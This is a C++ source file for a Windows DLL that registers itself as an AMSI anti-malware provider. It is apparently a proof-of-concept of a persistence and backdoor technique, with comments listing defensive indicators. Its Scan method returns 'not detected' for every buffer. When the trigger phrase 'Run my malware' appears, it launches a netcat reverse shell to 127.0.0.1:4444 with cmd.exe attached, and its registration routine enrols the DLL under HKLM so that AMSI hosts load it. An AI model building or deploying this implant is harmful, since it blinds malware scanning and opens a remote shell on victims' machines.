#include "stdafx.h"
#include <process.h>
using namespace Microsoft::WRL;
// Handle of this DLL, captured in DllMain on process attach. DllRegisterServer
// uses it to resolve the DLL's own path for the InProcServer32 registration.
HMODULE g_currentModule;
/// DLL entry point. On process attach it records the module handle, turns off
/// per-thread attach/detach notifications and brings up the WRL in-proc module;
/// on process detach it tears that module down. All other reasons are ignored.
BOOL APIENTRY DllMain(HMODULE module, DWORD reason, LPVOID reserved)
{
    if (reason == DLL_PROCESS_ATTACH)
    {
        g_currentModule = module;
        DisableThreadLibraryCalls(module);
        Module<InProc>::GetModule().Create();
    }
    else if (reason == DLL_PROCESS_DETACH)
    {
        Module<InProc>::GetModule().Terminate();
    }
    return TRUE;
}
#pragma region COM server boilerplate
/// COM export: S_OK when the WRL module reports it holds no live objects and may
/// be unloaded, S_FALSE otherwise.
HRESULT WINAPI DllCanUnloadNow()
{
    const auto canUnload = Module<InProc>::GetModule().Terminate();
    if (canUnload)
    {
        return S_OK;
    }
    return S_FALSE;
}
/// COM export: hands the class-factory request straight to the WRL module, which
/// knows every class registered via CoCreatableClass in this DLL.
STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID FAR* ppv)
{
    auto& wrlModule = Module<InProc>::GetModule();
    return wrlModule.GetClassObject(rclsid, riid, ppv);
}
#pragma endregion
// In-proc COM object implementing IAntimalwareProvider. The CLSID below is the
// one DllRegisterServer writes under Software\Classes\CLSID and under
// Software\Microsoft\AMSI\Providers, which is what makes AMSI clients load this
// DLL. FtmBase makes the object free-threaded (matches the "Both" threading model
// written at registration).
class
DECLSPEC_UUID("2E5D8A62-77F9-4F7B-A90C-2744820139B2")
SampleAmsiProvider : public RuntimeClass<RuntimeClassFlags<ClassicCom>, IAntimalwareProvider, FtmBase>
{
public:
    // Called by the AMSI host for each buffer to be scanned; see the definition
    // below — this implementation never returns a verdict other than NOT_DETECTED.
    IFACEMETHOD(Scan)(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result) override;
    // Session teardown hook; empty in this implementation.
    IFACEMETHOD_(void, CloseSession)(_In_ ULONGLONG session) override;
    // Human-readable provider name shown by the host.
    IFACEMETHOD(DisplayName)(_Outptr_ LPWSTR* displayName) override;
private:
    // Declared but never read or written anywhere in this file.
    LONG m_requestNumber = 0;
};
// IAntimalwareProvider::Scan.
//
// A genuine provider inspects the buffer and returns a verdict. This one always
// writes AMSI_RESULT_NOT_DETECTED (no other value is ever assigned below), so
// every buffer the host submits is allowed through, and when the buffer equals
// one of three hard-coded trigger strings it additionally starts
// MyThreadFunction. In other words this is a rogue AMSI provider carrying a
// trigger-activated payload, not a scanner.
//
// Defensive notes: a provider registered under
// Software\Microsoft\AMSI\Providers whose DLL is not a known AV vendor's signed
// binary, and child processes spawned from the AMSI host process itself, are the
// observable indicators of this technique.
HRESULT SampleAmsiProvider::Scan(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result)
{
    // ntdll helpers resolved at runtime; neither GetProcAddress result is
    // null-checked before use. The _RtlInitUnicodeString/_RtlEqualUnicodeString
    // typedefs are not in this file (presumably stdafx.h).
    _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
    _RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
    // Three spellings of the same trigger phrase: bare, double-quoted, single-quoted.
    UNICODE_STRING myTriggerString1;
    RtlInitUnicodeString(&myTriggerString1, L"Run my malware");
    UNICODE_STRING myTriggerString2;
    RtlInitUnicodeString(&myTriggerString2, L"\"Run my malware\"");
    UNICODE_STRING myTriggerString3;
    RtlInitUnicodeString(&myTriggerString3, L"'Run my malware'");
    // Both left uninitialized. The early return below fires only when GetAttribute
    // FAILS and actualSize happens to equal the expected size; a failed call with any
    // other actualSize falls through and contentSize is used unset.
    ULONG actualSize;
    ULONGLONG contentSize;
    if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_SIZE, sizeof(ULONGLONG), reinterpret_cast<PBYTE>(&contentSize), &actualSize)) &&
        actualSize == sizeof(ULONGLONG))
    {
        *result = AMSI_RESULT_NOT_DETECTED;
        return S_OK;
    }
    // Same condition shape for the content pointer.
    PBYTE contentAddress;
    if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_ADDRESS, sizeof(PBYTE), reinterpret_cast<PBYTE>(&contentAddress), &actualSize)) &&
        actualSize == sizeof(PBYTE))
    {
        *result = AMSI_RESULT_NOT_DETECTED;
        return S_OK;
    }
    if (contentAddress)
    {
        // Only short buffers (< 50 bytes) are compared against the triggers.
        if (contentSize < 50)
        {
            // Wraps the host's buffer as a UNICODE_STRING without copying; Length is a
            // byte count and is narrowed to USHORT. The buffer is assumed to be UTF-16
            // text — TODO confirm against the AMSI host, which may also hand over raw bytes.
            UNICODE_STRING myuni;
            myuni.Buffer = (PWSTR)contentAddress;
            myuni.Length = (USHORT)contentSize;
            myuni.MaximumLength = (USHORT)contentSize;
            // Case-insensitive (third argument TRUE) match against any trigger spelling.
            if (RtlEqualUnicodeString(&myTriggerString1, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString2, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString3, &myuni, TRUE))
            {
                // Payload runs on a new thread inside the AMSI host process; the returned
                // thread handle is discarded (never closed) and the call's failure is ignored.
                DWORD thId;
                CreateThread(NULL, 0, MyThreadFunction, NULL, 0, &thId);
            }
        }
    }
    // Unconditional "clean" verdict — including for the buffer that just fired the payload.
    *result = AMSI_RESULT_NOT_DETECTED;
    return S_OK;
}
/// IAntimalwareProvider::CloseSession. Nothing in this class tracks per-session
/// state, so there is nothing to release here.
void SampleAmsiProvider::CloseSession(_In_ ULONGLONG session)
{
    (void)session; // intentionally unused
}
/// IAntimalwareProvider::DisplayName. Returns a pointer to a string literal with
/// static storage; the caller receives it as a non-const LPWSTR but must treat it
/// as read-only and must not free it.
HRESULT SampleAmsiProvider::DisplayName(_Outptr_ LPWSTR *displayName)
{
    static constexpr const wchar_t* kDisplayName = L"Sample AMSI Provider";
    *displayName = const_cast<LPWSTR>(kDisplayName);
    return S_OK;
}
// Registers SampleAmsiProvider with the WRL module so DllGetClassObject can serve
// a class factory for the CLSID declared on the class.
CoCreatableClass(SampleAmsiProvider);
// Thread body started from Scan when a trigger string is matched. It shells out
// to a hard-coded netcat binary that connects back to 127.0.0.1:4444 with cmd.exe
// attached — a reverse shell running inside whatever process loaded this AMSI
// provider. system() blocks the thread for as long as that process lives.
// Scan references this function before this definition, so a prior declaration is
// presumably in stdafx.h.
//
// Defensive notes: the fixed path c:\Temp\nc64.exe, and cmd.exe / nc64.exe being
// spawned by an AMSI host process, are the concrete indicators here.
DWORD WINAPI MyThreadFunction(LPVOID lpParam)
{
    system("c:\\Temp\\nc64.exe 127.0.0.1 4444 -e cmd.exe");
    return 0;
}
#pragma region Install / uninstall
/// Writes `stringValue` as a REG_SZ value. `subkey` may be null to target `key`
/// itself and `valueName` may be null to target the key's default value. The
/// size handed to the registry is a byte count including the terminating NUL.
/// Returns the Win32 status converted to an HRESULT (S_OK on success).
HRESULT SetKeyStringValue(_In_ HKEY key, _In_opt_ PCWSTR subkey, _In_opt_ PCWSTR valueName, _In_ PCWSTR stringValue)
{
    const size_t charCount = wcslen(stringValue) + 1;
    const DWORD byteCount = static_cast<DWORD>(charCount * sizeof(wchar_t));
    const LONG status = RegSetKeyValue(key, subkey, valueName, REG_SZ, stringValue, byteCount);
    return HRESULT_FROM_WIN32(status);
}
// regsvr32 entry point. Registers the class as an in-proc COM server and then
// enrols its CLSID as an AMSI provider. Every write goes to HKEY_LOCAL_MACHINE,
// so this only succeeds from an elevated context.
//
// Defensive note: the Software\Microsoft\AMSI\Providers\<CLSID> key written at the
// end is the high-value audit point — a new entry there, especially one whose
// InProcServer32 path points outside vendor install directories, deserves review.
STDAPI DllRegisterServer()
{
    // Full path of this DLL, from the handle recorded in DllMain; a truncated
    // result is rejected rather than registered.
    wchar_t modulePath[MAX_PATH];
    if (GetModuleFileName(g_currentModule, modulePath, ARRAYSIZE(modulePath)) >= ARRAYSIZE(modulePath))
    {
        return E_UNEXPECTED;
    }
    // "{xxxxxxxx-...}" form of the class's CLSID (38 chars + NUL fits in 40).
    wchar_t clsidString[40];
    if (StringFromGUID2(__uuidof(SampleAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
    {
        return E_UNEXPECTED;
    }
    // COM class registration: friendly name on the CLSID key itself.
    wchar_t keyPath[200];
    HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls", clsidString);
    if (FAILED(hr)) return hr;
    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"SampleAmsiProvider");
    if (FAILED(hr)) return hr;
    // InProcServer32: the DLL path COM loads, plus the "Both" threading model
    // (consistent with the FtmBase the class derives from).
    hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls\\InProcServer32", clsidString);
    if (FAILED(hr)) return hr;
    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, modulePath);
    if (FAILED(hr)) return hr;
    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, L"ThreadingModel", L"Both");
    if (FAILED(hr)) return hr;
    // Register this CLSID as an anti-malware provider. This is the step that makes
    // AMSI hosts load the DLL; the COM keys above alone would not.
    hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Microsoft\\AMSI\\Providers\\%ls", clsidString);
    if (FAILED(hr)) return hr;
    hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"SampleAmsiProvider");
    if (FAILED(hr)) return hr;
    return S_OK;
}
// regsvr32 /u entry point. Removes the AMSI provider enrolment first, then the COM
// class registration, mirroring DllRegisterServer in reverse. Like registration,
// this writes under HKEY_LOCAL_MACHINE and needs elevation. A key that is already
// absent is treated as success so the call is idempotent.
STDAPI DllUnregisterServer()
{
    wchar_t clsidString[40];
    if (StringFromGUID2(__uuidof(SampleAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
    {
        return E_UNEXPECTED;
    }
    // Unregister this CLSID as an anti-malware provider.
    wchar_t keyPath[200];
    HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Microsoft\\AMSI\\Providers\\%ls", clsidString);
    if (FAILED(hr)) return hr;
    // RegDeleteTree removes the key and any subkeys; ERROR_PATH_NOT_FOUND is not an error here.
    LONG status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath);
    if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status);
    // Unregister this CLSID as a COM server (drops the InProcServer32 subkey as well).
    hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls", clsidString);
    if (FAILED(hr)) return hr;
    status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath);
    if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status);
    return S_OK;
}
#pragma endregion